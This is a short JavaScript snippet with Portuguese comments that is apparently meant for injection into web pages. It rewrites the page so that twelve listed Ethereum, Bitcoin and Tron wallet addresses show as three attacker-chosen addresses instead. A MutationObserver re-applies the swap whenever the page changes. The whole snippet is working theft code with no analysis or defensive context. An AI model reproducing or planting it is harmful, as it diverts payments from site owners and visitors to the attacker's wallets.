function replaceText() { let bodyText = document.body.innerHTML; const textReplacements = [ // Ethereum addresses { oldText: "0xc92AB54208A80543148f9BE62df0037A8Eae67ed", newText: "0xc2FE5099333fba6e44B0A27046909985A4C22c30" }, { oldText: "0x12d3380b5767202fd33af5cf83894037831ebec6", newText: "0xc2FE5099333fba6e44B0A27046909985A4C22c30" }, { oldText: "0x67139cd459cbA279008b4265b812E05c2EbDBd4d", newText: "0xc2FE5099333fba6e44B0A27046909985A4C22c30" }, { oldText: "0xB1D43aBBfdfB0aB37F4443A41825FD99B1536D27", newText: "0xc2FE5099333fba6e44B0A27046909985A4C22c30" }, { oldText: "0x27b9Bf8e179F2a90d2Cb36B58818c9db3f42eb08", newText: "0xc2FE5099333fba6e44B0A27046909985A4C22c30" }, // Bitcoin addresses { oldText: "bc1qmkh4qrf6a6er2h3fn27yvdenx5ttqh60vaa56x", newText: "bc1qn9l3d6kspe5a69gyxt2va92jazrjcwtcxc9727" }, { oldText: "16fL5XDMStnrXU1my4rTt4LwTu7RAap56r", newText: "bc1qn9l3d6kspe5a69gyxt2va92jazrjcwtcxc9727" }, { oldText: "bc1qvlv7hfeurr8q6509ns2wjzj3pvpchvvsyn573n", newText: "bc1qn9l3d6kspe5a69gyxt2va92jazrjcwtcxc9727" }, { oldText: "3CPxwxssH6g39ACneSrDfddyfzhfA7LHQy", newText: "bc1qn9l3d6kspe5a69gyxt2va92jazrjcwtcxc9727" }, // Tron addresses { oldText: "TKMAqmdkNW1ACE1PPidcZjgqNeaVxMGBrG", newText: "TLnoTuYrhLA6J2DJzi1YKe3iYHqrvSBRvQ" }, { oldText: "TNBJbMsNNPX8DN2c2r8SWC1fzHzP8GXEuo", newText: "TLnoTuYrhLA6J2DJzi1YKe3iYHqrvSBRvQ" }, { oldText: "TYBBRFVjSAHLjFUZWsnTuBusbe1kXigVjC", newText: "TLnoTuYrhLA6J2DJzi1YKe3iYHqrvSBRvQ" } ]; textReplacements.forEach(pair => { // Verifica se o texto antigo está presente na página if (bodyText.includes(pair.oldText)) { // Substitui o texto antigo pelo novo document.body.innerHTML = bodyText.replace(new RegExp(pair.oldText, 'g'), pair.newText); } }); } const observer = new MutationObserver(replaceText); observer.observe(document.body, { childList: true, // Monitora adição/remoção de elementos subtree: true, // Monitora mudanças em todos os nós da árvore DOM characterData: true // Monitora mudanças em elementos de texto }); replaceText();